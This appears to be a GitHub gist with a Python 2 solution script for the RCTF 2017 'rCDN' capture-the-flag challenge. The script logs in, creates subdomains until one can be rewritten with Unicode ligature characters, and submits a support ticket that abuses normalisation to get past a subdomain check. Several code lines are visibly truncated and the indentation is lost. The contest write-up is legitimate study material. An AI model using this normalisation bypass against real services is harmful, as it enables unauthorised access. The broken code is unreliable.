Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
RCTF 2017 - rCDN Solution
# coding: utf-8
Unfortunately solved 20 minutes after the end of the CTF :(
import re
import sys
import string
import requests
import itertools
target = ''
username = 'XXXXXXXXXX'
password = 'XXXXXXXXXX'
url_login = target + 'signin'
url_dashboard = target + 'dashboard'
url_create_domain = target + 'dashboard/basic/new'
url_destroy_domain = target + 'dashboard/basic/destroy/{}'
url_tickets = target + 'support/ticket'
url_create_ticket = target + 'support/ticket/new'
proxies = {'http':''}
def get_csrfmiddlewaretoken(url):
resp = sess.get(url)
csrfmiddlewaretoken ='value=\'([a-zA-Z0-9]{64})\'', resp.content)
csrfmiddlewaretoken =
return csrfmiddlewaretoken
def login():
print '[*] logging in...'
csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_login)
data = {
'csrfmiddlewaretoken': csrfmiddlewaretoken,
'username': username,
'password': password
resp =, data=data, proxies=proxies)
return 'Sign out' in resp.content
def create_domain():
print '[*] creating subdomain'
resp = sess.get(url_create_domain, proxies=proxies)
messages = sess.cookies['messages']
fail_msg = 'You have exceeded maximum number of Basic CDN service'
if fail_msg in messages: return False
subdomain ='\\\\([a-zA-Z0-9]{8})\\\\', messages)
subdomain =
return subdomain
def destroy_domain(subdomain):
print '[*] destroying subdomain: ' + subdomain
resp = sess.get(url_destroy_domain.format(subdomain), proxies=proxies)
return sess.cookies['messages']
def create_ticket(subdomain):
print '[*] creating ticket for subdomain: ' + subdomain
csrfmiddlewaretoken = get_csrfmiddlewaretoken(url_create_ticket)
data = {
'csrfmiddlewaretoken': csrfmiddlewaretoken,
'subject': subdomain,
'subdomain': subdomain,
'message': subdomain,
resp =, data=data, proxies=proxies)
fail_msg = 'Only email support is available for Basic CDN Service.'
if resp.status_code == 200 and fail_msg in resp.content:
return fail_msg
return sess.cookies['messages']
global sess
sess = requests.session()
login = login()
if not login:
print '[-] failed to login'
required = [ 'hv', 'mv', 'sd', 'ss', 'ppv', 'wc', 'mc', 'md', 'dj', 'cd', 'wz', 'hg', 'erg', 'ev', 'ltd', 'hpa', 'da', 'au', 'bar', 'ov', 'pc', 'dm', 'dm2', 'dm3', 'iu', 'pa', 'na', 'ma', 'ka', 'kb', 'mb', 'gb', 'cal', 'kcal', 'pf', 'nf', 'mg', 'kg', 'hz', 'khz', 'mhz', 'ghz', 'thz', 'ml', 'dl', 'kl', 'fm', 'nm', 'mm', 'cm', 'km', 'mm2', 'cm2', 'm2', 'km2', 'mm3', 'cm3', 'm3', 'km3', 'pa', 'kpa', 'mpa', 'gpa', 'rad', 'ps', 'ns', 'ms', 'pv', 'nv', 'mv', 'kv', 'mv', 'pw', 'nw', 'mw', 'kw', 'mw', 'bq', 'cc', 'cd', 'db', 'gy', 'ha', 'hp', 'in', 'kk', 'km', 'kt', 'lm', 'ln', 'log', 'lx', 'mb', 'mil', 'mol', 'ph', 'ppm', 'pr', 'sr', 'sv', 'wb', 'gal', 'ff', 'fi', 'fl', 'ffi', 'ffl', 'st', 'st', 'no', 'sm', 'tel', 'tm', 'fax' ]
while True:
subdomain = create_domain()
matches = [x for x in required if x in subdomain]
if len(matches) >= 2:
print '[+] Subdomain: ' + subdomain
# Found domain: 'ghzlnmdg'
t = '\xe3\x8e\x93'.decode('utf-8') + 'l' + '\xe3\x8e\x9a'.decode('utf-8') + 'dg'
print '[*] ' + create_ticket(t)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment